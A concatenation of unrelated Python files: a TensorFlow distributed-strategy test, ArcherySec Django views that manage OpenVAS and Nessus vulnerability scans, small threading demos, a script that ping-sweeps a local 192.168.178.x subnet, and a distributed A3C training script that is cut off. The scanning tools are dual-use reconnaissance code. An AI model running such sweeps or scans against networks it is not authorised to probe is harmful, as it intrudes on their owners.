with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
# Test read value inside caching scope
with distribute_utils.cache_variable_reads():
v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
self.assertEqual(v.read_value(), 1.0) # should be cached 1.0 value.
# Reset v to 2.0
v.assign(2.0)
# Test convert to tensor value inside caching scope
with distribute_utils.cache_variable_reads():
t = v * 3.0
self.assertEqual(t, 6.0)
v.assign(3.0)
t1 = v * 3.0
self.assertEqual(t1, 6.0) # should be cached 2.0 * 3.0 value.
# Reset v to 1.0
v.assign(1.0)
# Verify caching scope inside tf.function
@def_function.function
def worker_fn():
with distribute_utils.cache_variable_reads():
def replica_fn():
t = v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return 1.0
return t # Should be 1.0 instead of 5.0
return self.strategy.run(replica_fn)
result = self.coordinator.schedule(worker_fn)
result = result.fetch()
expected_result = 1.
self.assertEqual(result, expected_result)
# Verify that v.read_value works as expected outside of scope.
v.assign(4.0)
self.assertEqual(v.read_value(), 4.0)
v.assign(constant_op.constant(2.0)) # v changes to 2.0
# Check with scope outside of tf function and check that cache is reset
@def_function.function
def worker_fn1():
def replica_fn():
t = v.read_value() # Reads value 2.0 ==> Should be cached
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return cached value 2.0
return t # Should be 2.0 instead of 5.0
return self.strategy.run(replica_fn)
with distribute_utils.cache_variable_reads():
result = self.coordinator.schedule(worker_fn1)
result = result.fetch()
expected_result = 2.
self.assertEqual(result, expected_result)
# Verify scope nesting is not permitted.
with self.assertRaises(ValueError):
with distribute_utils.cache_variable_reads():
with distribute_utils.cache_variable_reads():
v.read_value()
def testDistributeDataset(self):
def per_worker_dataset_fn():
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return self.strategy.experimental_local_results(next(iterator))
distributed_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = result.fetch()
expected_result = array_ops.split(
math_ops.range(1., 5.),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(result, (expected_result))
def testDistributeDatasetsFromFunction(self):
def per_worker_dataset_fn():
def input_worker_device_fn(input_context):
self.assertIsNotNone(input_context)
return dataset_ops.DatasetV2.range(1, 11).batch(1)
return self.strategy.distribute_datasets_from_function(
input_worker_device_fn)
@def_function.function
def worker_fn(iterator):
result = self.strategy.experimental_local_results(next(iterator))
return result
distributed_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = result.fetch()
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append([1 + i])
self.assertAllEqual(result, expected_result)
def testAsyncScheduleWithDistributedDataset(self):
def input_fn():
dataset = dataset_ops.DatasetV2.from_tensor_slices([2.]).repeat().batch(
self.strategy.num_replicas_in_sync)
return self.strategy.experimental_distribute_dataset(dataset)
with self.strategy.scope():
v = variables.Variable(initial_value=[0], dtype=dtypes.float32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
# Reduce to convert PerReplica values to single value
reduced_value = self.strategy.reduce('MEAN', x, axis=None)
v.assign_add(reduced_value)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertAllEqual(v.read_value(), (0,))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
# With 5 addition it should be 2*5 = 10.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[10]]))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[20]]))
def testInputFunctionWithMapWithDistributedDataset(self):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
dataset = dataset_ops.DatasetV2.range(0, 10).batch(
self.strategy.num_replicas_in_sync).map(map_fn)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
expected_result = array_ops.split(
math_ops.range(10., 10. + self.strategy.num_replicas_in_sync),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(
self.strategy.experimental_local_results(result.fetch()),
tuple(expected_result))
self.assertEqual(self._map_fn_tracing_count, 1)
def testCallingDistributeDatasetOutside(self):
with self.assertRaises(ValueError):
dataset = dataset_ops.DatasetV2.range(1, 2).batch(10)
self.strategy.experimental_distribute_dataset(dataset)
with self.assertRaises(ValueError):
self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.range(1, 2).batch(2))
def testPerWorkerDistributeDatasetsElementSpec(self):
def per_worker_dataset_fn():
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.from_tensor_slices([1, 2]))
dataset = dataset_ops.DatasetV2.from_tensor_slices([1, 2])
per_worker_distribute_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
self.assertAllEqual(
# Converts to PerReplicaSpec when num_replicas_in_sync are > 1
input_lib._create_distributed_tensor_spec(self.strategy,
dataset.element_spec),
per_worker_distribute_dataset.element_spec)
def testPerWorkerDistributedIteratorTypeSpec(self):
self._tracing_count = 0
def per_worker_dataset_fn():
self._tracing_count += 1
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.range(1, 2))
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_iterator = iter(
self.coordinator.create_per_worker_dataset(per_worker_dataset_fn))
worker_fn.get_concrete_function(distributed_iterator)
self.coordinator.schedule(worker_fn, args=(distributed_iterator,))
self.assertEqual(self._tracing_count, 1)
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
views.py
|
# -*- coding: utf-8 -*-
# _
# /\ | |
# / \ _ __ ___| |__ ___ _ __ _ _
# / /\ \ | '__/ __| '_ \ / _ \ '__| | | |
# / ____ \| | | (__| | | | __/ | | |_| |
# /_/ \_\_| \___|_| |_|\___|_| \__, |
# __/ |
# |___/
# Copyright (C) 2017-2018 ArcherySec
# This file is part of ArcherySec Project.
""" Author: Anand Tiwari """
from __future__ import unicode_literals
import os
import threading
import time
import uuid
import xml.etree.ElementTree as ET
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import render, render_to_response, HttpResponse
from django.utils import timezone
from archerysettings import save_settings
from networkscanners.models import scan_save_db, \
ov_scan_result_db, \
task_schedule_db, \
nessus_scan_db, nessus_report_db
from projects.models import project_db
from scanners.scanner_parser.network_scanner import OpenVas_Parser, Nessus_Parser
from scanners.scanner_plugin.network_scanner.openvas_plugin import OpenVAS_Plugin, vuln_an_id
from background_task.models import Task
from background_task import background
from datetime import datetime
openvas_data = os.getcwd() + '/' + 'apidata.json'
status = ""
name = ""
creation_time = ""
modification_time = ""
host = ""
port = ""
threat = ""
severity = ""
description = ""
page = ""
family = ""
cvss_base = ""
cve = ""
bid = ""
xref = ""
tags = ""
banner = ""
def index(request):
"""
Function calling network base html.
:param request:
:return:
"""
all_ip = scan_save_db.objects.all()
return render(request, 'index.html', {'all_ip': all_ip})
def scan_status(request):
"""
Check the network scan status.
:param request:
:return:
"""
if request.method == 'POST':
all_ip = scan_save_db.objects.all()
scan_ip = request.POST.get('scan_id', )
return render(request, 'index.html')
def scan_vul_details(request):
"""
Get the Network scan vulnerability details.
:param request:
:return:
"""
scanid = ""
if request.method == 'GET':
scanid = request.GET['scan_id']
print "scansss", scanid
if request.method == 'POST':
vuln_id = request.POST.get('vuln_id')
scan_id = request.POST.get('scan_id')
false_positive = request.POST.get('false')
ov_scan_result_db.objects.filter(
scan_id=scan_id,
vul_id=vuln_id).update(
false_positive=false_positive)
return HttpResponseRedirect(
'/networkscanners/vul_details/?scan_id=%s' % scan_id)
all_vuln = ov_scan_result_db.objects.filter(scan_id=scanid,
false_positive='No').values('name', 'severity',
'vuln_color',
'threat', 'host',
'port', 'vul_id').distinct()
all_false_vul = ov_scan_result_db.objects.filter(scan_id=scanid,
false_positive='Yes').values('name', 'severity',
'vuln_color',
'threat', 'host',
'port', 'vul_id').distinct()
print "zzzzzz", scanid
return render(request,
'vul_details.html',
{'all_vuln': all_vuln,
'scan_id': scanid,
'all_false_vul': all_false_vul})
def openvas_scanner(scan_ip, project_id, sel_profile):
"""
The function is launch the OpenVAS scans.
:param scan_ip:
:param project_id:
:param sel_profile:
:return:
"""
openvas = OpenVAS_Plugin(scan_ip, project_id, sel_profile)
scanner = openvas.connect()
scan_id, target_id = openvas.scan_launch(scanner)
date_time = datetime.now()
save_all = scan_save_db(scan_id=str(scan_id),
project_id=str(project_id),
scan_ip=scan_ip,
target_id=str(target_id),
date_time=date_time)
save_all.save()
openvas.scan_status(scanner=scanner, scan_id=scan_id)
time.sleep(5)
vuln_an_id(scan_id=scan_id)
return HttpResponse(status=201)
def launch_scan(request):
"""
Function Trigger Network scans.
:param request:
:return:
"""
all_ip = scan_save_db.objects.all()
if request.method == 'POST':
all_ip = scan_save_db.objects.all()
scan_ip = request.POST.get('ip')
project_id = request.POST.get('project_id')
sel_profile = request.POST.get('scan_profile')
ip = scan_ip.replace(" ", "")
target_split = ip.split(',')
split_length = target_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
target = target_split.__getitem__(i)
print "Scan Launched IP:", target
thread = threading.Thread(target=openvas_scanner, args=(target, project_id, sel_profile))
thread.daemon = True
thread.start()
return render_to_response('vul_details.html',
{'all_ip': all_ip})
def scan_del(request):
"""
Delete Network scans.
:param request:
:return:
"""
if request.method == 'POST':
scan_id = request.POST.get('scan_id')
scan_item = str(scan_id)
value = scan_item.replace(" ", "")
value_split = value.split(',')
split_length = value_split.__len__()
# print "split_lenght", split_length
for i in range(0, split_length):
scan_id = value_split.__getitem__(i)
scans = scan_save_db.objects.filter(scan_id=scan_id).order_by('scan_id')
scans.delete()
vuln_data = ov_scan_result_db.objects.filter(scan_id=scan_id)
vuln_data.delete()
return HttpResponseRedirect("/networkscanners/")
def ip_scan(request):
"""
List all network scan IP's.
:param request:
:return:
"""
all_scans = scan_save_db.objects.all()
all_proj = project_db.objects.all()
return render(request,
'ipscan.html',
{'all_scans': all_scans,
'all_proj': all_proj})
def ip_scan_table(request):
"""
Network scan Table.
:param request:
:return:
"""
all_scans = scan_save_db.objects.all()
return render(request, 'ip_scan_table.html', {'all_scans': all_scans})
def openvas_details(request):
"""
OpenVAS tool settings.
:param request:
:return:
"""
save_openvas_setting = save_settings.SaveSettings(openvas_data)
if request.method == 'POST':
openvas_host = request.POST.get("scan_host")
openvas_user = request.POST.get("openvas_user")
openvas_password = request.POST.get("openvas_password")
save_openvas_setting.openvas_settings(
ipaddress=openvas_host,
openvas_user=openvas_user,
openvas_password=openvas_password,
)
messages.add_message(request,
messages.SUCCESS,
'Openvas Setting Updated ')
return render(request, 'setting_form.html', )
def openvas_setting(request):
"""
Calling OpenVAS setting page.
:param request:
:return:
"""
return render(request,
'setting_form.html', )
def del_vuln(request):
"""
Delete Network Vulnerability.
:param request:
:return:
"""
if request.method == 'POST':
vuln_id = request.POST.get("del_vuln")
un_scanid = request.POST.get("scan_id")
print "scan_iddd", un_scanid
scan_item = str(vuln_id)
value = scan_item.replace(" ", "")
value_split = value.split(',')
split_length = value_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
vuln_id = value_split.__getitem__(i)
delete_vuln = ov_scan_result_db.objects.filter(vul_id=vuln_id)
delete_vuln.delete()
ov_all_vul = ov_scan_result_db.objects.filter(scan_id=un_scanid).order_by('scan_id')
total_vul = len(ov_all_vul)
total_high = len(ov_all_vul.filter(threat="High"))
total_medium = len(ov_all_vul.filter(threat="Medium"))
total_low = len(ov_all_vul.filter(threat="Low"))
scan_save_db.objects.filter(scan_id=un_scanid) \
.update(total_vul=total_vul,
high_total=total_high,
medium_total=total_medium,
low_total=total_low)
# messages.success(request, "Deleted vulnerability")
return HttpResponseRedirect("/networkscanners/vul_details/?scan_id=%s" % un_scanid)
def edit_vuln(request):
"""
Edit Network scan vulnerabilities.
:param request:
:return:
"""
if request.method == 'POST':
scan_id = request.POST.get("scan_id")
vul_id = request.POST.get("vuln_id")
name = request.POST.get("name")
creation_time = request.POST.get("creation_time")
modification_time = request.POST.get("modification_time")
host = request.POST.get("host")
port = request.POST.get("port")
threat = request.POST.get("threat")
severity = request.POST.get("severity")
description = request.POST.get("description")
family = request.POST.get("family")
cvss_base = request.POST.get("cvss_base")
cve = request.POST.get("cve")
# bid = request.POST.get("bid")
xref = request.POST.get("xref")
tags = request.POST.get("tags")
banner = request.POST.get("banner")
ov_scan_result_db.objects.filter(vul_id=vul_id).update(name=name,
creation_time=creation_time,
modification_time=modification_time,
host=host, port=port,
threat=threat,
severity=severity,
description=description, family=family,
cvss_base=cvss_base, cve=cve,
xref=xref, tags=tags, banner=banner)
messages.success(request, "Vulnerability Edited")
return HttpResponseRedirect("/networkscanners/vul_details/?scan_id=%s" % scan_id)
if request.method == 'GET':
id_vul = request.GET['vuln_id']
else:
id_vul = ''
edit_vul_dat = ov_scan_result_db.objects.filter(vul_id=id_vul).order_by('vul_id')
return render(request, 'ov_edit_vuln_data.html', {'edit_vul_dat': edit_vul_dat})
def vuln_check(request):
"""
Get the detailed vulnerability information.
:param request:
:return:
"""
if request.method == 'GET':
id_vul = request.GET['vuln_id']
else:
id_vul = ''
vul_dat = ov_scan_result_db.objects.filter(vul_id=id_vul).order_by('vul_id')
return render(request, 'ov_vuln_data.html', {'vul_dat': vul_dat})
def add_vuln(request):
"""
Add network vulnerability.
:param request:
:return:
"""
if request.method == 'GET':
scan_id = request.GET['scan_id']
else:
scan_id = ''
if request.method == 'POST':
vuln_id = uuid.uuid4()
scan_id = request.POST.get("scan_id")
name = request.POST.get("name")
creation_time = request.POST.get("creation_time")
modification_time = request.POST.get("modification_time")
host = request.POST.get("host")
port = request.POST.get("port", )
threat = request.POST.get("threat", )
severity = request.POST.get("severity", )
description = request.POST.get("description", )
family = request.POST.get("family", )
cvss_base = request.POST.get("cvss_base", )
cve = request.POST.get("cve", )
# bid = request.POST.get("bid")
xref = request.POST.get("xref", )
tags = request.POST.get("tags", )
banner = request.POST.get("banner", )
save_vuln = ov_scan_result_db(name=name,
vul_id=vuln_id,
scan_id=scan_id,
creation_time=creation_time,
modification_time=modification_time,
host=host, port=port,
threat=threat,
severity=severity,
description=description,
family=family,
cvss_base=cvss_base,
cve=cve,
xref=xref,
tags=tags,
banner=banner,
false_positive='No',
)
save_vuln.save()
messages.success(request, "Vulnerability Added")
return HttpResponseRedirect("/networkscanners/vul_details/?scan_id=%s" % scan_id)
return render(request, 'ov_add_vuln.html', {'scan_id': scan_id})
def OpenVas_xml_upload(request):
"""
OpenVAS XML file upload.
:param request:
:return:
"""
all_project = project_db.objects.all()
if request.method == "POST":
project_id = request.POST.get("project_id")
scanner = request.POST.get("scanner")
xml_file = request.FILES['xmlfile']
scan_ip = request.POST.get("scan_url")
scan_id = uuid.uuid4()
scan_status = "100"
if scanner == "openvas":
date_time = datetime.now()
scan_dump = scan_save_db(scan_ip=scan_ip,
scan_id=scan_id,
date_time=date_time,
project_id=project_id,
scan_status=scan_status)
scan_dump.save()
tree = ET.parse(xml_file)
root_xml = tree.getroot()
OpenVas_Parser.xml_parser(project_id=project_id,
scan_id=scan_id,
root=root_xml)
return HttpResponseRedirect("/networkscanners/")
elif scanner == "nessus":
date_time = datetime.now()
scan_dump = nessus_scan_db(
scan_ip=scan_ip,
scan_id=scan_id,
date_time=date_time,
project_id=project_id,
scan_status=scan_status
)
scan_dump.save()
scan_dump.save()
tree = ET.parse(xml_file)
root_xml = tree.getroot()
Nessus_Parser.nessus_parser(root=root_xml,
scan_id=scan_id,
project_id=project_id,
)
return HttpResponseRedirect("/networkscanners/nessus_scan")
return render(request,
'net_upload_xml.html',
{'all_project': all_project})
@background(schedule=60)
def task(target_ip, project_id, scanner):
rescan_id = ''
rescan = 'No'
sel_profile = ''
ip = target_ip.replace(" ", "")
target__split = ip.split(',')
split_length = target__split.__len__()
for i in range(0, split_length):
target = target__split.__getitem__(i)
if scanner == 'open_vas':
thread = threading.Thread(target=openvas_scanner, args=(target, project_id, sel_profile))
thread.daemon = True
thread.start()
return HttpResponse(status=200)
def net_scan_schedule(request):
"""
:param request:
:return:
"""
all_scans_db = project_db.objects.all()
all_scheduled_scans = task_schedule_db.objects.all()
if request.method == 'POST':
scan_ip = request.POST.get('ip')
scan_schedule_time = request.POST.get('datetime')
project_id = request.POST.get('project_id')
scanner = request.POST.get('scanner')
# periodic_task = request.POST.get('periodic_task')
periodic_task_value = request.POST.get('periodic_task_value')
# periodic_task = 'Yes'
print 'scanner-', scanner
if periodic_task_value == 'HOURLY':
periodic_time = Task.HOURLY
elif periodic_task_value == 'DAILY':
periodic_time = Task.DAILY
elif periodic_task_value == 'WEEKLY':
periodic_time = Task.WEEKLY
elif periodic_task_value == 'EVERY_2_WEEKS':
periodic_time = Task.EVERY_2_WEEKS
elif periodic_task_value == 'EVERY_4_WEEKS':
periodic_time = Task.EVERY_4_WEEKS
else:
periodic_time = None
dt_str = scan_schedule_time
dt_obj = datetime.strptime(dt_str, '%d/%m/%Y %H:%M:%S %p')
print "scan_ip", scan_ip
print "schedule", scan_schedule_time
# task(scan_ip, project_id, schedule=dt_obj)
ip = scan_ip.replace(" ", "")
target__split = ip.split(',')
split_length = target__split.__len__()
for i in range(0, split_length):
target = target__split.__getitem__(i)
if scanner == 'open_vas':
if periodic_task_value == 'None':
my_task = task(target, project_id, scanner, schedule=dt_obj)
task_id = my_task.id
print "Savedddddd taskid", task_id
else:
my_task = task(target, project_id, scanner, repeat=periodic_time, repeat_until=None)
task_id = my_task.id
print "Savedddddd taskid", task_id
save_scheadule = task_schedule_db(task_id=task_id, target=target,
schedule_time=scan_schedule_time,
project_id=project_id,
scanner=scanner,
periodic_task=periodic_task_value)
save_scheadule.save()
return render(request, 'network_scan_schedule.html',
{'all_scans_db': all_scans_db,
'all_scheduled_scans': all_scheduled_scans}
)
def del_net_scan_schedule(request):
"""
:param request:
:return:
"""
if request.method == "POST":
task_id = request.POST.get('task_id')
scan_item = str(task_id)
taskid = scan_item.replace(" ", "")
target_split = taskid.split(',')
split_length = target_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
task_id = target_split.__getitem__(i)
del_task = task_schedule_db.objects.filter(task_id=task_id)
del_task.delete()
del_task_schedule = Task.objects.filter(id=task_id)
del_task_schedule.delete()
return HttpResponseRedirect('/networkscanners/net_scan_schedule')
def nessus_scan(request):
"""
:param request:
:return:
"""
all_scan = nessus_scan_db.objects.all()
return render(request,
'nessus_scan.html',
{'all_scan': all_scan}
)
def nessus_vuln_details(request):
"""
:param request:
:return:
"""
scanid = ""
if request.method == 'GET':
scanid = request.GET['scan_id']
print "scansss", scanid
if request.method == 'POST':
vuln_id = request.POST.get('vuln_id')
scan_id = request.POST.get('scan_id')
false_positive = request.POST.get('false')
nessus_report_db.objects.filter(scan_id=scan_id,
vul_id=vuln_id).update(false_positive=false_positive)
return HttpResponseRedirect(
'/networkscanners/nessus_vuln_details/?scan_id=%s' % scan_id)
all_vuln = nessus_report_db.objects.filter(scan_id=scanid,
false_positive='No')
all_false_vul = nessus_report_db.objects.filter(scan_id=scanid,
false_positive='Yes')
print "zzzzzz", scanid
return render(request,
'nessus_vuln_details.html',
{'all_vuln': all_vuln,
'scan_id': scanid,
'all_false_vul': all_false_vul})
def delete_nessus_scan(request):
if request.method == "POST":
scan_id = request.POST.get('scan_id')
del_vuln = request.POST.get('del_vuln')
scan_item = str(scan_id)
taskid = scan_item.replace(" ", "")
target_split = taskid.split(',')
split_length = target_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
task_id = target_split.__getitem__(i)
del_rep = nessus_report_db.objects.filter(scan_id=task_id)
del_rep.delete()
del_scan = nessus_scan_db.objects.filter(scan_id=task_id)
del_scan.delete()
return HttpResponseRedirect('/networkscanners/nessus_scan')
def delete_nessus_vuln(request):
if request.method == "POST":
vuln_id = request.POST.get("del_vuln")
un_scanid = request.POST.get("scan_id")
print "scan_iddd", un_scanid
scan_item = str(vuln_id)
value = scan_item.replace(" ", "")
value_split = value.split(',')
split_length = value_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
vuln_id = value_split.__getitem__(i)
delete_vuln = nessus_report_db.objects.filter(vul_id=vuln_id)
delete_vuln.delete()
ov_all_vul = nessus_report_db.objects.filter(scan_id=un_scanid).order_by('scan_id')
total_vul = len(ov_all_vul)
total_critical = len(ov_all_vul.filter(risk_factor="Critical"))
total_high = len(ov_all_vul.filter(risk_factor="High"))
total_medium = len(ov_all_vul.filter(risk_factor="Medium"))
total_low = len(ov_all_vul.filter(risk_factor="Low"))
nessus_scan_db.objects.filter(scan_id=un_scanid) \
.update(total_vul=total_vul,
critical_total=total_critical,
high_total=total_high,
medium_total=total_medium,
low_total=total_low)
# messages.success(request, "Deleted vulnerability")
return HttpResponseRedirect("/networkscanners/nessus_vuln_details/?scan_id=%s" % un_scanid)
def nessus_vuln_check(request):
"""
Get the detailed vulnerability information.
:param request:
:return:
"""
if request.method == 'GET':
id_vul = request.GET['vuln_id']
else:
id_vul = ''
vul_dat = nessus_report_db.objects.filter(vul_id=id_vul)
return render(request, 'nessus_vuln_data.html', {'vul_dat': vul_dat})
|
thread_RLock.py
|
"""
Race condition
Thread safe
Dead lock
atomic
"""
from threading import Thread, RLock
num = 0 # shared resource
lock = RLock()
def add():
global num
with lock:
subtract()
for _ in range(100000):
num += 1
def subtract():
global num
with lock:
for _ in range(100000):
num -= 1
def both():
subtract()
add()
t1 = Thread(target=add)
t2 = Thread(target=subtract)
t1.start()
t2.start()
t1.join()
t2.join()
print(num)
print('Done . . . ')
|
queue_threads.py
|
import unittest
import json
import time
from functools import wraps
from threading import Thread, Lock
from app import app
from data.queue import WorkQueue
from initdb import wipe_database, initialize_database, populate_database
QUEUE_NAME = "testqueuename"
class AutoUpdatingQueue(object):
def __init__(self, queue_to_wrap):
self._queue = queue_to_wrap
def _wrapper(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
to_return = func(*args, **kwargs)
self._queue.update_metrics()
return to_return
return wrapper
def __getattr__(self, attr_name):
method_or_attr = getattr(self._queue, attr_name)
if callable(method_or_attr):
return self._wrapper(method_or_attr)
else:
return method_or_attr
class QueueTestCase(unittest.TestCase):
TEST_MESSAGE_1 = json.dumps({"data": 1})
def setUp(self):
self.transaction_factory = app.config["DB_TRANSACTION_FACTORY"]
self.queue = AutoUpdatingQueue(WorkQueue(QUEUE_NAME, self.transaction_factory))
wipe_database()
initialize_database()
populate_database()
class TestQueueThreads(QueueTestCase):
def test_queue_threads(self):
count = [20]
for i in range(count[0]):
self.queue.put([str(i)], self.TEST_MESSAGE_1)
lock = Lock()
def get(lock, count, queue):
item = queue.get()
if item is None:
return
self.assertEqual(self.TEST_MESSAGE_1, item.body)
with lock:
count[0] -= 1
threads = []
# The thread count needs to be a few times higher than the queue size
# count because some threads will get a None and thus won't decrement
# the counter.
for i in range(100):
t = Thread(target=get, args=(lock, count, self.queue))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(count[0], 0)
if __name__ == "__main__":
unittest.main()
|
main.py
|
import os
import threading
class IPList:
def __init__(self):
self.IP_LIST=[]
self.MAX_THREAD=500
self._r_th=0
self._slt=[]
self._ipl=[]
for i in range(1,255):
self.IP_LIST+=[f"192.168.178.{i}"]
def _check_one(self):
if (len(self._slt)==0):
return
self._r_th+=1
ip=self._slt[0]
del self._slt[0]
o=os.popen(f"@echo off&&cd C:\\Windows\\System32\\&&ping {ip} -n 1 -w 100 -l 1").read()
if (o.split("\n")[2]!="Request timed out." and "Destination host unreachable." not in o.split("\n")[2]):
self._ipl+=[ip]
thr=threading.Thread(target=self._check_one,args=(),kwargs={})
thr.start()
self._r_th-=1
def check_all(self):
self._slt=self.IP_LIST[:]
self._ipl=[]
for i in range(1,self.MAX_THREAD):
thr=threading.Thread(target=self._check_one,args=(),kwargs={})
thr.start()
while (len(self._slt)>0 or self._r_th>0):
pass
return self._ipl
def check_loop(self):
while (True):
ipl=self.check_all()
ipl.sort()
os.system("cls")
print("Active IP's:\n\n"+"\n".join(ipl))
IPList().check_loop()
|
A3C_distributed_tf.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example using distributed tensorflow + multiprocessing.
"""
import multiprocessing as mp
import tensorflow as tf
import numpy as np
import gym, time
import matplotlib.pyplot as plt
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
env = gym.make('CartPole-v0')
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
sess = None
def __init__(self, scope, opt_a=None, opt_c=None, global_net=None):
if scope == 'global_net': # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else:
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(
tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32),
axis=1, keep_dims=True)
exp_v = log_prob * tf.stop_gradient(td)
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
self.global_step = tf.train.get_or_create_global_step()
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, global_net.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, global_net.c_params)]
with tf.name_scope('push'):
self.update_a_op = opt_a.apply_gradients(zip(self.a_grads, global_net.a_params), global_step=self.global_step)
self.update_c_op = opt_c.apply_gradients(zip(self.c_grads, global_net.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return a_prob, v, a_params, c_params
def choose_action(self, s): # run by a local
prob_weights = self.sess.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
def update_global(self, feed_dict): # run by a local
self.sess.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
self.sess.run([self.pull_a_params_op, self.pull_c_params_op])
def work(job_name, task_index, global_ep, lock, r_queue, global_running_r):
# set work's ip:port
cluster = tf.train.ClusterSpec({
"ps": ['localhost:2220', 'localhost:2221',],
"worker": ['localhost:2222', 'localhost:2223', 'localhost:2224', 'localhost:2225',]
})
server = tf.train.Server(cluster, job_name=job_name, task_index=task_index)
if job_name == 'ps':
print('Start Parameter Sever: ', task_index)
server.join()
else:
t1 = time.time()
env = gym.make('CartPole-v0').unwrapped
print('Start Worker: ', task_index)
with tf.device(tf.train.replica_device_setter(
worker_device="/job:worker/task:%d" % task_index,
cluster=cluster)):
opt_a = tf.train.RMSPropOptimizer(LR_A, name='opt_a')
opt_c = tf.train.RMSPropOptimizer(LR_C, name='opt_c')
global_net = ACNet('global_net')
local_net = ACNet('local_ac%d' % task_index, opt_a, opt_c, global_net)
# set training steps
hooks = [tf.train.StopAtStepHook(last_step=100000)]
with tf.train.MonitoredTrainingSession(master=server.target,
is_chief=True,
hooks=hooks,) as sess:
print('Start Worker Session: ', task_index)
local_net.sess = sess
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while (not sess.should_stop()) and (global_ep.value < 1000):
s = env.reset()
ep_r = 0
while True:
# if task_index:
# env.render()
